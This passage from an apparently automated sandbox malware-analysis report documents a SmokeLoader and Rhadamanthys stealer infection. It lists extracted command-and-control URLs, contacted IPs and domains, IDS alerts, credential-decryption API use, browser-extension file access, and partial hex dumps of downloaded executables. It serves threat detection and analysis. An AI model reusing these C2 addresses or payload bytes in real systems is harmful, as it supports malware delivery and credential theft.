"E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows
    Source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AFC06C CryptUnprotectData,12_2_00007DF449AFC06C

    Compliance

    barindex
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeUnpacked PE file: 14.2.8EAD.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeUnpacked PE file: 18.2.A4A.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeUnpacked PE file: 29.2.ECAC.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeUnpacked PE file: 31.2.DC3D.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\1128.exeUnpacked PE file: 9.2.1128.exe.400000.0.unpack
    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 176.61.150.108:443 -> 192.168.2.6:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 190.114.9.88:443 -> 192.168.2.6:49768 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49770 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49781 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49783 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49791 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.6:49797 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 195.96.151.46:443 -> 192.168.2.6:49803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 45.154.253.152:443 -> 192.168.2.6:49804 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49807 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49813 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49818 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49830 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 45.15.156.204:443 -> 192.168.2.6:49837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49850 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49852 version: TLS 1.2
    Source: Binary string: netutils.pdbUGP source: rundll32.exe, 0000000C.00000003.413979669.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: 352F.PDB3 source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbUGP source: rundll32.exe, 0000000C.00000003.378362910.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: rpcrt4.pdb source: rundll32.exe, 0000000C.00000003.374891452.00000156F18D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.374604013.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ucrtbase.pdb source: rundll32.exe, 0000000C.00000003.371994060.00000156F17A0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\AppData\Local\Temp\352F.PDB source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: rpcrt4.pdbUGP source: rundll32.exe, 0000000C.00000003.374891452.00000156F18D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.374604013.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: (PKo0C:\Windows\mscorlib.pdb source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.pdbUGP source: rundll32.exe, 0000000C.00000003.375171512.00000156EF9E3000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: advapi32.pdb source: rundll32.exe, 0000000C.00000003.392389951.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: fltLib.pdb source: rundll32.exe, 0000000C.00000003.411457320.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: cfgmgr32.pdbUGP source: rundll32.exe, 0000000C.00000003.399831459.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: crypt32.pdbUGP source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdb source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: psapi.pdbUGP source: rundll32.exe, 0000000C.00000003.394742994.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msasn1.pdbUGP source: rundll32.exe, 0000000C.00000003.417704379.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32.pdbUGP source: rundll32.exe, 0000000C.00000003.381552796.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dwmapi.pdbUGP source: rundll32.exe, 0000000C.00000003.391980672.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: kernel32.pdb source: rundll32.exe, 0000000C.00000003.357527718.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: user32.pdbUGP source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdb source: rundll32.exe, 0000000C.00000003.378362910.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: win32u.pdb source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdb source: rundll32.exe, 0000000C.00000003.381642575.00000156F18F5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ucrtbase.pdbUGP source: rundll32.exe, 0000000C.00000003.371994060.00000156F17A0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dwmapi.pdb source: rundll32.exe, 0000000C.00000003.391980672.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: fltLib.pdbGCTL source: rundll32.exe, 0000000C.00000003.411457320.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: imm32.pdb source: rundll32.exe, 0000000C.00000003.386518863.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbUGP source: rundll32.exe, 0000000C.00000003.381642575.00000156F18F5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: profapi.pdb source: rundll32.exe, 0000000C.00000003.411361309.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32.pdb source: rundll32.exe, 0000000C.00000003.381552796.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 0000000C.00000003.357527718.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ws2_32.pdb source: rundll32.exe, 0000000C.00000003.392185369.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msctf.pdbUGP source: rundll32.exe, 0000000C.00000003.388939351.00000156F17AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.389131965.00000156F1930000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 0000000C.00000003.356049880.00000156F14A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.355006773.00000156F1680000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.354216907.00000156F14A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ole32.pdbUGP source: rundll32.exe, 0000000C.00000003.411534915.00000156F17A4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: powrprof.pdbUGP source: rundll32.exe, 0000000C.00000003.411390290.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: powrprof.pdb source: rundll32.exe, 0000000C.00000003.411390290.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msctf.pdb source: rundll32.exe, 0000000C.00000003.388939351.00000156F17AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.389131965.00000156F1930000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ole32.pdb source: rundll32.exe, 0000000C.00000003.411534915.00000156F17A4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: win32u.pdbGCTL source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: Kernel.Appcore.pdbUGP source: rundll32.exe, 0000000C.00000003.411302282.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbUGP source: rundll32.exe, 0000000C.00000003.386518863.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: user32.pdb source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .pdb-H source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: msasn1.pdb source: rundll32.exe, 0000000C.00000003.417704379.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: Kernel.Appcore.pdb source: rundll32.exe, 0000000C.00000003.411302282.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: psapi.pdb source: rundll32.exe, 0000000C.00000003.394742994.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdbUGP source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: advapi32.pdbUGP source: rundll32.exe, 0000000C.00000003.392389951.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: netapi32.pdb source: rundll32.exe, 0000000C.00000003.413933146.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.pdb source: rundll32.exe, 0000000C.00000003.375171512.00000156EF9E3000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: cfgmgr32.pdb source: rundll32.exe, 0000000C.00000003.399831459.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdbUGP source: rundll32.exe, 0000000C.00000003.391792177.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdb source: rundll32.exe, 0000000C.00000003.356049880.00000156F14A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.355006773.00000156F1680000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.354216907.00000156F14A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: profapi.pdbUGP source: rundll32.exe, 0000000C.00000003.411361309.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: netapi32.pdbUGP source: rundll32.exe, 0000000C.00000003.413933146.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdb source: rundll32.exe, 0000000C.00000003.391792177.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ws2_32.pdbUGP source: rundll32.exe, 0000000C.00000003.392185369.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: 352F.exe, 00000013.00000002.611328292.0000000004103000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: netutils.pdb source: rundll32.exe, 0000000C.00000003.413979669.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdb source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: crypt32.pdb source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF782C FindFirstFileW,FindNextFileW,FindClose,12_2_00007DF449AF782C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF828C FindFirstFileW,FindNextFileW,12_2_00007DF449AF828C

    Networking

    barindex
    Source: C:\Windows\explorer.exeNetwork Connect: 189.143.218.79 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeNetwork Connect: 104.21.18.99 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: bitbucket.org
    Source: C:\Windows\explorer.exeDomain query: perficut.at
    Source: C:\Windows\explorer.exeDomain query: potunulit.org
    Source: C:\Windows\explorer.exeDomain query: smartbot.dev
    Source: C:\Windows\explorer.exeNetwork Connect: 144.76.136.153 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 190.114.9.88 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 109.206.243.143 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 104.192.141.1 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.126 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 79.102.150.149 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: www.shorturl.at
    Source: C:\Windows\explorer.exeNetwork Connect: 45.154.253.152 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 67.199.248.10 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: ads-optimization-of-meta.web.app
    Source: C:\Windows\explorer.exeNetwork Connect: 45.15.156.204 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 95.158.162.200 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: github.com
    Source: C:\Windows\explorer.exeNetwork Connect: 45.9.74.80 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.3 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.4 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.106.124.133 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: cdn-153.hotfile.io
    Source: C:\Windows\explorer.exeNetwork Connect: 58.235.189.192 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 199.36.158.100 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: uaery.top
    Source: C:\Windows\explorer.exeNetwork Connect: 80.85.241.98 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 195.96.151.46 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: beg.com.ve
    Source: C:\Windows\explorer.exeNetwork Connect: 176.61.150.108 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: bit.ly
    Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: shorturl.at
    Source: C:\Windows\explorer.exeDomain query: hotfile.io
    Source: C:\Windows\explorer.exeNetwork Connect: 104.234.118.34 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 86.122.83.142 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: transfer.sh
    Source: C:\Windows\explorer.exeDomain query: autoacores.com
    Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.6:59504 -> 8.8.8.8:53
    Source: TrafficSnort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.6:49718 -> 179.43.176.6:80
    Source: TrafficSnort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 179.43.176.6:80 -> 192.168.2.6:49718
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: c3g6gx853u6j.xyz
    Source: Malware configuration extractorURLs: http://bihsy.com/test2/get.php
    Source: Malware configuration extractorURLs: http://bulimu55t.net/
    Source: Malware configuration extractorURLs: http://soryytlic4.net/
    Source: Malware configuration extractorURLs: http://bukubuka1.net/
    Source: Malware configuration extractorURLs: http://novanosa5org.org/
    Source: Malware configuration extractorURLs: http://hujukui3.net/
    Source: Malware configuration extractorURLs: http://newzelannd66.org/
    Source: Malware configuration extractorURLs: http://golilopaster.org/
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:04:31 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 15 Feb 2023 15:00:03 GMTETag: "af800-5f4be55c01562"Accept-Ranges: bytesContent-Length: 718848Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d a8 88 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 a6 1c 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 1e 00 00 04 00 00 49 75 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 a0 1d 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 14 0b 1c 00 00 70 01 00 00 26 09 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 69 78 6f 00 00 00 05 00 00 00 00 80 1d 00 00 02 00 00 00 88 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 6f 62 6f 00 00 00 00 04 00 00 00 90 1d 00 00 04 00 00 00 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 68 00 00 00 a0 1d 00 00 6a 00 00 00 8e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 15 Feb 2023 15:04:46 GMTContent-Type: application/octet-streamContent-Length: 3826176Last-Modified: Sun, 12 Feb 2023 12:38:07 GMTConnection: keep-aliveETag: "63e8ddaf-3a6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae dd e8 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 58 3a 00 00 08 00 00 00 00 00 00 5e 76 3a 00 00 20 00 00 00 80 3a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 